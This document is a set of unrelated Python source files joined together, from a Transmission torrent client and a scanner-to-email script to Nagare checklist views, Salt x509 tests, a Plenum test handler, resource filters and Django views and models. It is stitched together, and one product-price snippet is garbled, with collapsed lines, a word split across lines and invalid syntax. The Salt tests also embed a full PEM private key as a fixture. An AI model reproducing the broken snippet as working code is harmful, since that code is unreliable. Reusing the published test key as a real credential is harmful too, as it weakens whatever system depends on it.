
        self.url = self.host + self.rpcurl + '/rpc'

    def _get_auth(self):
        """Fetch and validate the CSRF session id; None when unreachable."""
        post_data = json.dumps({'method': 'session-get', })

        try:
            self.response = self.session.post(self.url, data=post_data.encode('utf-8'), timeout=120,
                                              verify=sickbeard.TORRENT_VERIFY_CERT)
            # Transmission replies 409 with the session id embedded in the
            # body/headers text; a raw string keeps the regex escapes valid.
            # (BUG FIX: was a non-raw string with \s/\w escapes.)
            self.auth = re.search(r'X-Transmission-Session-Id:\s*(\w+)', self.response.text).group(1)
        except Exception:
            # BUG FIX: was a bare `except:` which also swallowed SystemExit/
            # KeyboardInterrupt. Keep the deliberate best-effort "no auth"
            # result, but only for genuine errors (connection failures,
            # missing header -> AttributeError).
            return None

        self.session.headers.update({'x-transmission-session-id': self.auth})

        # Validating Transmission authorization
        post_data = json.dumps({'arguments': {},
                                'method': 'session-get',
                                })
        self._request(method='post', data=post_data)

        return self.auth

    def _add_torrent_uri(self, result):
        """Add a torrent by URL/magnet; honors paused and download-dir prefs."""
        arguments = {'filename': result.url,
                     'paused': 1 if sickbeard.TORRENT_PAUSED else 0,
                     'download-dir': sickbeard.TORRENT_PATH
                     }
        post_data = json.dumps({'arguments': arguments,
                                'method': 'torrent-add',
                                })
        self._request(method='post', data=post_data)

        return self.response.json()['result'] == "success"

    def _add_torrent_file(self, result):
        """Add a torrent from in-memory .torrent content (base64 metainfo)."""
        arguments = {'metainfo': b64encode(result.content),
                     'paused': 1 if sickbeard.TORRENT_PAUSED else 0,
                     'download-dir': sickbeard.TORRENT_PATH
                     }
        post_data = json.dumps({'arguments': arguments,
                                'method': 'torrent-add',
                                })
        self._request(method='post', data=post_data)

        return self.response.json()['result'] == "success"

    def _set_torrent_ratio(self, result):
        """Set per-torrent seed ratio: -1 => seed forever, >=0 => stop at ratio."""
        ratio = None
        if result.ratio:
            ratio = result.ratio

        mode = 0
        if ratio:
            if float(ratio) == -1:
                # seedRatioMode 2: unlimited seeding.
                ratio = 0
                mode = 2
            elif float(ratio) >= 0:
                ratio = float(ratio)
                mode = 1  # Stop seeding at seedRatioLimit

        arguments = {'ids': [result.hash],
                     'seedRatioLimit': ratio,
                     'seedRatioMode': mode
                     }
        post_data = json.dumps({'arguments': arguments,
                                'method': 'torrent-set',
                                })
        self._request(method='post', data=post_data)

        return self.response.json()['result'] == "success"

    def _set_torrent_seed_time(self, result):
        """Set idle seeding limit (minutes) when configured; no-op otherwise."""
        if sickbeard.TORRENT_SEED_TIME and sickbeard.TORRENT_SEED_TIME != -1:
            # Config value is hours; the RPC expects minutes.
            time = int(60 * float(sickbeard.TORRENT_SEED_TIME))
            arguments = {'ids': [result.hash],
                         'seedIdleLimit': time,
                         'seedIdleMode': 1
                         }
            post_data = json.dumps({'arguments': arguments,
                                    'method': 'torrent-set',
                                    })
            self._request(method='post', data=post_data)

            return self.response.json()['result'] == "success"
        else:
            return True

    def _set_torrent_priority(self, result):
        """Map result.priority (-1/0/1) onto Transmission file priorities."""
        arguments = {'ids': [result.hash]}

        if result.priority == -1:
            arguments['priority-low'] = []
        elif result.priority == 1:
            # set high priority for all files in torrent
            arguments['priority-high'] = []
            # move torrent to the top if the queue
            arguments['queuePosition'] = 0
            if sickbeard.TORRENT_HIGH_BANDWIDTH:
                arguments['bandwidthPriority'] = 1
        else:
            arguments['priority-normal'] = []

        post_data = json.dumps({'arguments': arguments,
                                'method': 'torrent-set',
                                })
        self._request(method='post', data=post_data)

        return self.response.json()['result'] == "success"


api = TransmissionAPI()
#!/usr/bin/python
"""Mail a scanned PDF to the recipient configured for <function>/<user>.

Usage: script.py <function> <user> <pdf-filename>

Reads global.xml (via XmlDict), finds the menu option whose type matches
<function> and whose name matches <user>, and sends <pdf-filename> as an
attachment through the configured SMTP relay.
"""
import sys, os
from email.Utils import COMMASPACE, formatdate
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
# BUGFIX: MIMEImage was imported twice; the duplicate line is removed.
from email.MIMEImage import MIMEImage
from email.MIMEBase import MIMEBase
from email import Encoders
import smtplib
import XmlDict

function = sys.argv[1]
user = sys.argv[2]
filename = sys.argv[3]

conf = XmlDict.loadXml("global.xml")

# Locate the menu entry matching the requested function/user pair.
# BUGFIX: option_selected was previously left undefined (NameError below)
# when no entry matched; fail with a clear message instead.
option_selected = None
for option in conf["menu"]["option"]:
    if (option["type"].lower() == function.lower()) and (option["name"] == user):
        option_selected = option

if option_selected is None:
    sys.exit("No menu option matches function %r and user %r" % (function, user))

msg = MIMEMultipart()
msg['Subject'] = conf["subject"]
msg['From'] = conf["source"]
msg['To'] = COMMASPACE.join([option_selected["config"]])
msg['Date'] = formatdate(localtime=True)

# BUGFIX: typo "happely" -> "happily" in the user-visible body text.
text = "Your scanner happily delivered this pdf to your mailbox.\n"
msg.attach(MIMEText(text))

part = MIMEBase('application', "pdf")
# BUGFIX: the PDF file handle was previously leaked; close it deterministically.
pdf_file = open(filename, "rb")
try:
    part.set_payload(pdf_file.read())
finally:
    pdf_file.close()
Encoders.encode_base64(part)
part.add_header('Content-Disposition',
                'attachment; filename="%s"' % os.path.basename(filename))
msg.attach(part)

mailer = smtplib.SMTP(conf["smtp"])
#mailer.connect()
mailer.sendmail(conf["source"], option_selected["config"], msg.as_string())
mailer.close()
#--
# Copyright (c) 2012-2014 Net-ng.
# All rights reserved.
#
# This software is licensed under the BSD License, as described in
# the file LICENSE.txt, which you should have received as part of
# this distribution.
#--

# Nagare view functions for the checklist components.  Each renderer is
# registered on its component class via @presentation.render_for; 'h' is
# the HTML renderer, 'comp' the component being rendered.

from nagare import presentation, security, var, ajax
from nagare.i18n import _

from comp import NewChecklistItem, ChecklistTitle, ChecklistItemTitle, Checklists, Checklist, ChecklistItem


@presentation.render_for(NewChecklistItem)
def render_ChecklistTitle_edit(next_method, self, h, comp, *args):
    """Render the title of the associated object"""
    # NOTE(review): despite the name, this renders the "add item" form of a
    # NewChecklistItem component; the component answers with the typed text.
    text = var.Var(u'')
    with h.form(class_='new-item-form'):
        id_ = h.generate_id()
        h << h.input(type='text', value=text, id_=id_,
                     placeholder=_(u'Add item')).action(text)
        with h.div(class_='btn-group'):
            # Checkmark submits the new text; cross answers without a value.
            h << h.button(h.i(class_='icon-checkmark'), class_='btn').action(lambda: comp.answer(text()))
            h << h.button(h.i(class_='icon-cross'), class_='btn').action(comp.answer)
    if self.focus:
        # Focus the input once after creation, then reset the flag.
        h << h.script("YAHOO.util.Dom.get(%s).focus()" % ajax.py2js(id_))
        self.focus = False
    return h.root


@presentation.render_for(ChecklistTitle)
def render_ChecklistTitle(self, h, comp, *args):
    """Render the title of the associated object"""
    h << h.i(class_='icon-list')
    kw = {}
    kw['style'] = 'cursor: pointer;display: inline;'
    # Reuse the onclick produced by a link action so clicking the div
    # switches the component to edit mode (the 'return' is stripped so the
    # click is not cancelled).
    kw['onclick'] = h.a.action(comp.answer).get('onclick').replace('return', "")
    with h.div(class_='text-title', **kw):
        # Empty titles show a hover-only "Edit title" hint instead.
        content = self.text or h.span(_('Edit title'), class_='show_onhover')
        h << content
    return h.root


@presentation.render_for(ChecklistTitle, model='edit')
def render_ChecklistTitle_edit(next_method, self, h, comp, *args):
    """Render the title of the associated object"""
    text = var.Var(self.text)
    with h.form(class_='title-form'):
        id_ = h.generate_id()
        h << h.i(class_='icon-list')
        h << h.input(type='text', value=text, id_=id_,
                     placeholder=_(u'Checklist title')).action(text)
        with h.div(class_='btn-group'):
            # Checkmark persists the new title; cross cancels the edit.
            h << h.button(h.i(class_='icon-checkmark'), class_='btn').action(lambda: comp.answer(self.change_text(text())))
            h << h.button(h.i(class_='icon-cross'), class_='btn').action(comp.answer)
        h << h.script("YAHOO.util.Dom.get(%s).focus()" % ajax.py2js(id_))
    return h.root


@presentation.render_for(ChecklistItemTitle)
def render_ChecklistTitle(self, h, comp, *args):
    """Render the title of the associated object"""
    # Clicking the item title switches it to edit mode.
    return h.a(self.text).action(comp.answer)


@presentation.render_for(ChecklistItemTitle, model='edit')
def render_ChecklistTitle_edit(next_method, self, h, comp, *args):
    """Render the title of the associated object"""
    text = var.Var(self.text)
    with h.form(class_='item-title-form'):
        id_ = h.generate_id()
        h << h.input(type='text', value=text, id_=id_,
                     placeholder=_(u'Checklist title')).action(text)
        with h.div(class_='btn-group'):
            h << h.button(h.i(class_='icon-checkmark'), class_='btn').action(lambda: comp.answer(self.change_text(text())))
            h << h.button(h.i(class_='icon-cross'), class_='btn').action(comp.answer)
        h << h.script("YAHOO.util.Dom.get(%s).focus()" % ajax.py2js(id_))
    return h.root


@presentation.render_for(Checklists, 'button')
def render_Checklists_button(self, h, comp, model):
    # "Add checklist" toolbar button; only for users with the permission.
    if security.has_permissions('checklist', self.parent):
        with h.a(class_='btn').action(self.add_checklist):
            h << h.i(class_='icon-list')
            h << _('Checklist')
    return h.root


@presentation.render_for(Checklists)
def render_Checklists(self, h, comp, model):
    if security.has_permissions('checklist', self.parent):
        # On drag and drop: expose a JS callback that posts the new
        # checklist order back to self.reorder via nagare's ajax channel.
        action = ajax.Update(action=self.reorder)
        action = '%s;_a;%s=' % (h.add_sessionid_in_url(sep=';'), action._generate_replace(1, h))
        h.head.javascript(h.generate_id(), '''function reorder_checklists(data) {
            nagare_getAndEval(%s + YAHOO.lang.JSON.stringify(data));
        }''' % ajax.py2js(action))

        # On items drag and drop: same mechanism for item moves between lists.
        action = ajax.Update(action=self.reorder_items)
        action = '%s;_a;%s=' % (h.add_sessionid_in_url(sep=';'), action._generate_replace(1, h))
        h.head.javascript(h.generate_id(), '''function reorder_checklists_items(data) {
            nagare_getAndEval(%s + YAHOO.lang.JSON.stringify(data));
        }''' % ajax.py2js(action))

        id_ = h.generate_id()
        with h.div(class_='checklists', id=id_):
            # Each checklist answers its index so it can be deleted in place;
            # index is bound as a lambda default to avoid late binding.
            for index, clist in enumerate(self.checklists):
                h << clist.on_answer(lambda v, index=index: self.delete_checklist(index))
        # jQuery-UI sortables: one for whole checklists (vertical, dragged by
        # the list icon) and one for items (may move across checklists).
        h << h.script("""$(function() {
                $("#" + %(id)s).sortable({
                    placeholder: "ui-state-highlight",
                    axis: "y",
                    handle: ".icon-list",
                    cursor: "move",
                    stop: function( event, ui ) {
                        reorder_checklists($('.checklist').map(function() { return this.id }).get())
                    }
                });
                $(".checklists .checklist .content ul").sortable({
                    placeholder: "ui-state-highlight",
                    cursor: "move",
                    connectWith: ".checklists .checklist .content ul",
                    dropOnEmpty: true,
                    update: function(event, ui) {
                        var data = {
                            target: ui.item.closest('.checklist').attr('id'),
                            index: ui.item.index(),
                            id: ui.item.attr('id')
                        }
                        reorder_checklists_items(data);
                    }
                }).disableSelection();
            })""" % {'id': ajax.py2js(id_)})
    return h.root


@presentation.render_for(Checklists, 'badge')
def render_Checklists_badge(self, h, comp, model):
    # Compact "done / total" badge, only shown when checklists exist.
    if self.checklists:
        h << h.span(h.i(class_='icon-list'), ' ', self.nb_items, u' / ', self.total_items, class_='label')
    return h.root


@presentation.render_for(Checklist)
def render_Checklist(self, h, comp, model):
    with h.div(id='checklist_%s' % self.id, class_='checklist'):
        with h.div(class_='title'):
            h << self.title
            # Hide the delete control while the title is being edited.
            if self.title.model != 'edit':
                h << h.a(h.i(class_='icon-cross'), class_='delete').action(comp.answer, 'delete')
        with h.div(class_='content'):
            if self.items:
                h << comp.render(h, 'progress')
            with h.ul:
                for index, item in enumerate(self.items):
                    # DOM ids are used by the drag-and-drop reorder callbacks.
                    h << h.li(item.on_answer(lambda v, index=index: self.delete_item(index)),
                              id='checklist_item_%s' % item().id)
            h << self.new_item
    return h.root


@presentation.render_for(Checklist, 'progress')
def render_Checklist_progress(self, h, comp, model):
    # Percentage bar of completed items.
    progress = self.progress
    with h.div(class_='progress progress-success'):
        h << h.div(class_='bar', style='width:%s%%' % progress)
    h << h.span(progress, u'%', class_='percent')
    return h.root


@presentation.render_for(ChecklistItem)
def render_ChecklistItem(self, h, comp, model):
    # Checkbox icon toggles the done flag; title renders via its component.
    h << h.a(h.i(class_='icon-checkbox-' + ('checked' if self.done else 'unchecked'))).action(self.set_done)
    h << h.span(self.title, class_='done' if self.done else '')
    if not self.title.model == 'edit':
        h << h.a(h.i(class_='icon-cross'), class_='delete').action(comp.answer, 'delete')
    return h.root
"""Tests for the x509 state module, including FIPS-mode behaviour."""
import os
import tempfile

import salt.utils.files
from salt.modules import x509 as x509_mod
from salt.states import x509
from tests.support.helpers import dedent
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.mock import MagicMock
from tests.support.unit import TestCase, skipIf

try:
    import M2Crypto  # pylint: disable=unused-import

    HAS_M2CRYPTO = True
except ImportError:
    HAS_M2CRYPTO = False


class X509TestCase(TestCase, LoaderModuleMockMixin):
    """x509 state tests with FIPS mode disabled."""

    def setup_loader_modules(self):
        return {x509: {"__opts__": {"fips_mode": False}}}

    def test_certificate_info_matches(self):
        # Outside FIPS mode the MD5 fingerprint may be compared, so
        # identical info matches with no mismatched fields.
        cert_info = {"MD5 Finger Print": ""}
        required_info = {"MD5 Finger Print": ""}
        ret = x509._certificate_info_matches(cert_info, required_info)
        assert ret == (True, [])


class X509FipsTestCase(TestCase, LoaderModuleMockMixin):
    """x509 state tests with FIPS mode enabled (MD5 is unavailable)."""

    def setup_loader_modules(self):
        self.file_managed_mock = MagicMock()
        self.file_managed_mock.return_value = {"changes": True}
        return {
            x509: {
                "__opts__": {"fips_mode": True},
                "__salt__": {
                    "x509.get_pem_entry": x509_mod.get_pem_entry,
                    "x509.get_private_key_size": x509_mod.get_private_key_size,
                },
                "__states__": {"file.managed": self.file_managed_mock},
            }
        }

    @skipIf(not HAS_M2CRYPTO, "Skipping, M2Crypto is unavailable")
    def test_private_key_fips_mode(self):
        """private_key_managed keeps only the key when a file holds key+cert."""
        test_key = dedent(
            """
            -----BEGIN PRIVATE KEY-----
            MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDx7UUt0cPi5G51
            FmRBhAZtZb5x6P0PFn7GwnLmSvLNhCsOcD/vq/yBUU62pknzmOjM5pgWTACZj66O
            GOFmWBg06v8+sqUbaF9PZ/CxQD5MogmQhYNgfyuopHWWgLXMub2hlP+15qGohkzg
            Tr/mXp2ohVAb6ihjqb7XV9MiZaLNVX+XWauM8SlhqXMiJyDUopEGbg2pLsHhIMcX
            1twLlyDja+uDbCMZ4jDNB+wsWxTaPRH8KizfEabB1Cl+fdyD10pSAYcodOAnlkW+
            G/DX2hwb/ZAM9B1SXTfZ3gzaIIbqXBEHcZQNXxHL7szBTVcOmfx/RPfOeRncytb9
            Mit7RIBxAgMBAAECggEAD4Pi+uRIBsYVm2a7OURpURzEUPPbPtt3d/HCgqht1+ZR
            CJUEVK+X+wcm4Cnb9kZpL7LeMBfhtfdz/2LzGagurT4g7nlwg0h3TFVjJ0ryc+G0
            cVNOsKKXPzKE5AkPH7kNw04V9Cl9Vpx+U6hZQEHzJHqgP5oNyw540cCtJriT700b
            fG1q3PYKWSkDwTiUnJTnVLybFIKQC6urxTeT2UWeiBadfDY7DjI4USfrQsqCfGMO
            uWPpOOJk5RIvw5r0Of2xvxV76xCgzVTkgtWjBRMTEkfeYx3019xKlQtAKoGbZd1T
            tF8DH0cDlnri4nG7YT8yYvx/LWVDg12E6IZij1X60QKBgQD7062JuQGEmTd99a7o
            5TcgWYqDrmE9AEgJZjN+gnEPcsxc50HJaTQgrkV0oKrS8CMbStIymbzMKWifOj7o
            gvQBVecydq1AaXePt3gRe8vBFiP4cHjFcSegs9FDvdfJR36iHOBIgEp4DWvV1vgs
            +z82LT6Qy5kxUQvnlQ4dEaGdrQKBgQD175f0H4enRJ3BoWTrqt2mTAwtJcPsKmGD
            9YfFB3H4+O2rEKP4FpBO5PFXZ0dqm54hDtxqyC/lSXorFCUjVUBero1ECGt6Gnn2
            TSnhgk0VMxvhnc0GReIt4K9WrXGd0CMUDwIhFHj8kbb1X1yqt2hwyw7b10xFVStl
            sGv8CQB+VQKBgAF9q1VZZwzl61Ivli2CzeS/IvbMnX7C9ao4lK13EDxLLbKPG/CZ
            UtmurnKWUOyWx15t/viVuGxtAlWO/rhZriAj5g6CbVwoQ7DyIR/ZX8dw3h2mbNCe
            buGgruh7wz9J0RIcoadMOySiz7SgZS++/QzRD8HDstB77loco8zAQfixAoGBALDO
            FbTocfKbjrpkmBQg24YxR9OxQb/n3AEtI/VO2+38r4h6xxaUyhwd1S9bzWjkBXOI
            poeR8XTqNQ0BR422PTeUT3SohPPcUu/yG3jG3zmta47wjjPDS85lqEgtGvA0cPN7
            srErcatJ6nlOnGUSw9/K65y6lFeH2lIZ2hfwNM2dAoGBAMVCc7i3AIhLp6UrGzjP
            0ioCHCakpxfl8s1VQp55lhHlP6Y4RfqT72Zq7ScteTrisIAQyI9ot0gsuct2miQM
            nyDdyKGki/MPduGTzzWlBA7GZEHnxbAILH8kWJ7eE/Nh7zdF1CRts8utEO9L9S+0
            lVz1j/xGOseQk4cVos681Wpw
            -----END PRIVATE KEY-----"""
        )
        test_cert = dedent(
            """
            -----BEGIN CERTIFICATE-----
            MIIDazCCAlOgAwIBAgIUAfATs1aodKw11Varh55msmU0LoowDQYJKoZIhvcNAQEL
            BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
            GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0yMTAzMjMwMTM4MzdaFw0yMjAz
            MjMwMTM4MzdaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
            HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
            AQUAA4IBDwAwggEKAoIBAQDx7UUt0cPi5G51FmRBhAZtZb5x6P0PFn7GwnLmSvLN
            hCsOcD/vq/yBUU62pknzmOjM5pgWTACZj66OGOFmWBg06v8+sqUbaF9PZ/CxQD5M
            ogmQhYNgfyuopHWWgLXMub2hlP+15qGohkzgTr/mXp2ohVAb6ihjqb7XV9MiZaLN
            VX+XWauM8SlhqXMiJyDUopEGbg2pLsHhIMcX1twLlyDja+uDbCMZ4jDNB+wsWxTa
            PRH8KizfEabB1Cl+fdyD10pSAYcodOAnlkW+G/DX2hwb/ZAM9B1SXTfZ3gzaIIbq
            XBEHcZQNXxHL7szBTVcOmfx/RPfOeRncytb9Mit7RIBxAgMBAAGjUzBRMB0GA1Ud
            DgQWBBT0qx4KLhozvuWAI9peT/utYV9FITAfBgNVHSMEGDAWgBT0qx4KLhozvuWA
            I9peT/utYV9FITAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQDx
            tWvUyGfEwJJg1ViBa10nVhg5sEc6KfqcPzc2GvatIGJlAbc3b1AYu6677X04SQNA
            dYRA2jcZcKudy6eolPJow6SDpkt66IqciZYdbQE5h9elnwpZxmXlJTQTB9cEwyIk
            2em5DKpdIwa9rRDlbAjAVJb3015MtpKRu2gsQ7gl5X2U3K+DFsWtBPf+0xiJqUiq
            rd7tiHF/zylubSyH/LVONJZ6+/oT/qzJfxfpvygtQWcu4b2zzME/FPenMA8W6Rau
            ZYycQfpMVc7KwqF5/wfjnkmfxoFKnkD7WQ3qFCJ/xULk/Yn1hrvNeIr+khX3qKQi
            Y3BMA5m+J+PZrNy7EQSa
            -----END CERTIFICATE-----
            """
        )
        # BUGFIX: tempfile.mkstemp() returns an *open* OS-level file
        # descriptor that was previously leaked; close it, and remove the
        # temp file when the test finishes.
        fd, name = tempfile.mkstemp()
        os.close(fd)
        self.addCleanup(os.remove, name)
        with salt.utils.files.fopen(name, "w") as fhandle:
            fhandle.write(test_key)
            fhandle.write(test_cert)
        # Return value intentionally unused; the assertion below inspects
        # what was handed to file.managed.
        x509.private_key_managed(name)
        self.file_managed_mock.assert_called_once()
        assert (
            self.file_managed_mock.call_args.kwargs["contents"].strip()
            == test_key.strip()
        )

    def test_certificate_info_matches(self):
        # In FIPS mode MD5 is not allowed, so the MD5 fingerprint field is
        # reported as a mismatch even when the values are equal.
        cert_info = {"MD5 Finger Print": ""}
        required_info = {"MD5 Finger Print": ""}
        ret = x509._certificate_info_matches(cert_info, required_info)
        assert ret == (False, ["MD5 Finger Print"])
import re print " Wri
te product name : " nume_produs = raw_input() print " Write product price : " cost_produs = input() if (nume_produs == re.sub('[^a-z]',"",nume_produs)
): print ('%s %d'%(nume_produs,cost_produs)) else: print "Error ! You must tape letters" input()
from _sha256 import sha256
from typing import Optional

from common.serializers.serialization import domain_state_serializer
from plenum.common.constants import DOMAIN_LEDGER_ID
from plenum.common.request import Request
from plenum.common.txn_util import get_payload_data, get_from, get_req_id
from plenum.server.database_manager import DatabaseManager
from plenum.server.request_handlers.handler_interfaces.write_request_handler import WriteRequestHandler
from plenum.test.constants import BUY
from stp_core.common.log import getlogger

logger = getlogger()


class BuyHandler(WriteRequestHandler):
    """Write-request handler for the test-only BUY transaction type.

    Stores each BUY txn's ``amount`` in domain state under a key derived
    from the sender identifier and request id.
    """

    def __init__(self, database_manager: DatabaseManager):
        super().__init__(database_manager, BUY, DOMAIN_LEDGER_ID)

    def static_validation(self, request: Request) -> None:
        # Only the txn type is checked; BUY carries no other static rules here.
        self._validate_request_type(request)

    def dynamic_validation(self, request: Request, req_pp_time: Optional[int]) -> None:
        # No state-dependent rules for BUY; req_pp_time is accepted but unused.
        self._validate_request_type(request)

    def update_state(self, txn, prev_result, request, is_committed=False):
        """Write the txn's amount into state; prev_result/is_committed unused."""
        self._validate_txn_type(txn)
        key = self.gen_state_key(txn)
        value = domain_state_serializer.serialize({"amount": get_payload_data(txn)['amount']})
        self.state.set(key, value)
        logger.trace('{} after adding to state, headhash is {}'.
                     format(self, self.state.headHash))

    def gen_state_key(self, txn):
        # State key is a function of (sender identifier, request id) only.
        identifier = get_from(txn)
        req_id = get_req_id(txn)
        return self.prepare_buy_key(identifier, req_id)

    @staticmethod
    def prepare_buy_key(identifier, req_id):
        # sha256 digest of "<identifier><req_id>:buy" (raw 32-byte digest,
        # not hex), so keys are fixed-length and collision-resistant.
        return sha256('{}{}:buy'.format(identifier, req_id).encode()).digest()

    def __repr__(self):
        # NOTE(review): repr deliberately(?) says "TestHandler" rather than
        # the class name — this handler lives under plenum.test; confirm
        # before changing, as test output may rely on it.
        return "TestHandler"
# Resource filters used to include/exclude files, modules, packages and
# directories when collecting a program's dependencies.  Each filter
# exposes matches(res) -> truthy when the resource should be filtered.

import os
import finder
import re
import sys


def makefilter(name, xtrapath=None):
    """Build the most specific filter for *name* based on what finder.identify
    says it is (script/module -> ModFilter, package -> PkgFilter,
    directory -> DirFilter, binary -> FileFilter by basename,
    anything else -> FileFilter by full name)."""
    typ, nm, fullname = finder.identify(name, xtrapath)
    if typ in (finder.SCRIPT, finder.GSCRIPT, finder.MODULE):
        return ModFilter([os.path.splitext(nm)[0]])
    if typ == finder.PACKAGE:
        return PkgFilter([fullname])
    if typ == finder.DIRECTORY:
        return DirFilter([fullname])
    if typ in (finder.BINARY, finder.PBINARY):
        return FileFilter([nm])
    return FileFilter([fullname])


class _Filter:
    def __repr__(self):
        return '<'+self.__class__.__name__+' '+repr(self.elements)+'>'


class _NameFilter(_Filter):
    """ A filter mixin that matches (exactly) on name """
    def matches(self, res):
        # elements is a dict used as a set; missing names yield 0 (falsy).
        return self.elements.get(res.name, 0)


class _PathFilter(_Filter):
    """ A filter mixin that matches if the resource is below any of the paths"""
    def matches(self, res):
        p = os.path.normcase(os.path.abspath(res.path))
        # Walk up the directory chain.  Note the dirname() happens before
        # the first lookup, so only *ancestors* of res.path are tested,
        # never res.path itself — presumably intentional since elements
        # hold directories; confirm before changing.  The len > 3 bound
        # stops at filesystem roots (e.g. 'C:\\' or '/').
        while len(p) > 3:
            p = os.path.dirname(p)
            if self.elements.get(p, 0):
                return 1
        return 0


class _ExtFilter(_Filter):
    """ A filter mixin that matches based on file extensions (either way) """
    include = 0

    def matches(self, res):
        fnd = self.elements.get(os.path.splitext(res.path)[1], 0)
        # include=1 inverts the test: match everything whose extension is
        # NOT in the list.
        if self.include:
            return not fnd
        return fnd


class _TypeFilter(_Filter):
    """ A filter mixin that matches on resource type (either way) """
    include = 0

    def matches(self, res):
        fnd = self.elements.get(res.typ, 0)
        # Same inversion semantics as _ExtFilter.
        if self.include:
            return not fnd
        return fnd


class _PatternFilter(_Filter):
    """ A filter that matches if re.search succeeds on the resource path """
    def matches(self, res):
        for regex in self.elements:
            if regex.search(res.path):
                return 1
        return 0


class ExtFilter(_ExtFilter):
    """ A file extension filter.
        ExtFilter(extlist, include=0)
        where extlist is a list of file extensions """
    def __init__(self, extlist, include=0):
        self.elements = {}
        for ext in extlist:
            # Normalise bare extensions ('txt' -> '.txt') to match
            # os.path.splitext output.
            if ext[0:1] != '.':
                ext = '.'+ext
            self.elements[ext] = 1
        self.include = include


class TypeFilter(_TypeFilter):
    """ A filter for resource types.
        TypeFilter(typlist, include=0)
        where typlist is a subset of ['a','b','d','m','p','s','x','z'] """
    def __init__(self, typlist, include=0):
        self.elements = {}
        for typ in typlist:
            self.elements[typ] = 1
        self.include = include


class FileFilter(_NameFilter):
    """ A filter for data files """
    def __init__(self, filelist):
        self.elements = {}
        for f in filelist:
            self.elements[f] = 1


class ModFilter(_NameFilter):
    """ A filter for Python modules.
        ModFilter(modlist)
        where modlist is eg ['macpath', 'dospath'] """
    def __init__(self, modlist):
        self.elements = {}
        for mod in modlist:
            self.elements[mod] = 1


class DirFilter(_PathFilter):
    """ A filter based on directories.
        DirFilter(dirlist)
        dirs may be relative and will be normalized.
        Subdirectories of dirs will be excluded. """
    def __init__(self, dirlist):
        self.elements = {}
        for pth in dirlist:
            pth = os.path.normcase(os.path.abspath(pth))
            self.elements[pth] = 1


class PkgFilter(_PathFilter):
    """At this time, identical to a DirFilter (being lazy) """
    def __init__(self, pkglist):
        #warning - pkgs are expected to be full directories
        self.elements = {}
        for pkg in pkglist:
            pth = os.path.normcase(os.path.abspath(pkg))
            self.elements[pth] = 1


class StdLibFilter(_PathFilter):
    """ A filter that excludes anything found in the standard library """
    def __init__(self):
        # sys.exec_prefix/lib is where the stdlib lives for this interpreter.
        pth = os.path.normcase(os.path.join(sys.exec_prefix, 'lib'))
        self.elements = {pth:1}


class PatternFilter(_PatternFilter):
    """ A filter that excludes if any pattern is found in resource's path """
    def __init__(self, patterns):
        self.elements = []
        for pat in patterns:
            self.elements.append(re.compile(pat))
'''
Created on Nov 17, 2011

@author: mmornati
'''
from django.http import HttpResponse
from django.utils import simplejson as json
import logging
from celery.result import AsyncResult
from webui.restserver.template import render_agent_template
import sys

logger = logging.getLogger(__name__)


def get_progress(request, taskname, taskid):
    """Report the state/result of a celery task as a JSON HTTP response.

    Maps PENDING/PROGRESS to human-readable messages; when the backend
    result is a (response, content, agent, action) tuple, a 200 renders the
    agent template and a 408 reports a timeout failure.  Dict results with
    current/total are converted to a percentage 'value'.
    """
    logger.info("Requesting taskid: %s" % taskid)
    result = AsyncResult(taskid, backend=None, task_name=taskname)
    logger.info("TASKID: %s" % result.task_id)

    # BUGFIX: local was named 'dict', shadowing the builtin; renamed.
    progress = {}
    if result.state == 'PENDING':
        progress['state'] = 'Waiting for worker to execute task...'
    elif result.state == 'PROGRESS':
        progress['state'] = 'Operation in progress..'
    else:
        progress['state'] = result.state

    backend_response = None
    try:
        backend_response = result.result
    except Exception:
        # BUGFIX: was a bare 'except:' which also caught SystemExit and
        # KeyboardInterrupt; still best-effort — a missing backend result
        # only means we report state without content.
        logger.warn(sys.exc_info())

    if backend_response:
        if isinstance(result.result, tuple):
            response, content, agent, action = result.result
            if response.status == 200:
                json_data = render_agent_template(request, {}, content, {}, agent, action)
                return HttpResponse(json_data, mimetype="application/json")
            elif response.status == 408:
                progress['state'] = 'FAILURE'
                progress['message'] = 'TIMEOUT'
        else:
            if "current" in result.result and "total" in result.result:
                # Percentage of completion reported by the task itself.
                value = float(1.0 * result.result['current'] / result.result['total']) * 100
                progress['value'] = value
            else:
                progress.update({"responsecontent": result.result})
    else:
        progress['value'] = 0

    json_data = json.dumps(progress)
    return HttpResponse(json_data, mimetype="application/json")
from django.db import models
from djangotoolbox.fields import EmbeddedModelField, ListField
from django_mongodb_engine.contrib import MongoDBManager
import os

# Create your models here.


# save the created json file name path
# only one file for summary should be kept here
class UserJSonFile(models.Model):
    user_id = models.CharField(max_length=100)
    json_type = models.CharField(max_length=10)  # possible value is summary for the summary view
    json_file_name = models.CharField(max_length=100)  # save the name of the already created file name on disk


class Flow(models.Model):
    user_id = models.CharField(max_length=100)
    hash_value = models.CharField(max_length=50)
    file_name = models.CharField(max_length=50)
    upload_time = models.DateTimeField()
    file_type = models.CharField(max_length=150)
    file_size = models.IntegerField()
    path = models.FilePathField()
    pcaps = ListField(EmbeddedModelField('Pcap', null=True, blank=True))
    details = ListField(EmbeddedModelField('FlowDetails', null=True, blank=True))

    def __unicode__(self):
        return u'%s/%s' % (self.path, self.file_name)

    def get_upload_path(self):
        # Return the last two path components: <root>/<hash_dir>.
        hash_dir = os.path.basename(self.path)
        root = os.path.basename(os.path.dirname(self.path))
        return os.path.join(root, hash_dir)


class Pcap(models.Model):
    hash_value = models.CharField(max_length=100)
    file_name = models.FileField(upload_to="uploads", null=True, blank=True)
    path = models.FilePathField()
    packets = ListField(EmbeddedModelField('PacketDetails', null=True, blank=True))

    def __unicode__(self):
        return u'%s/%s' % (self.path, self.file_name)

    def get_upload_path(self):
        # Same <root>/<hash_dir> convention as Flow.get_upload_path.
        hash_dir = os.path.basename(self.path)
        root = os.path.basename(os.path.dirname(self.path))
        return os.path.join(root, hash_dir)


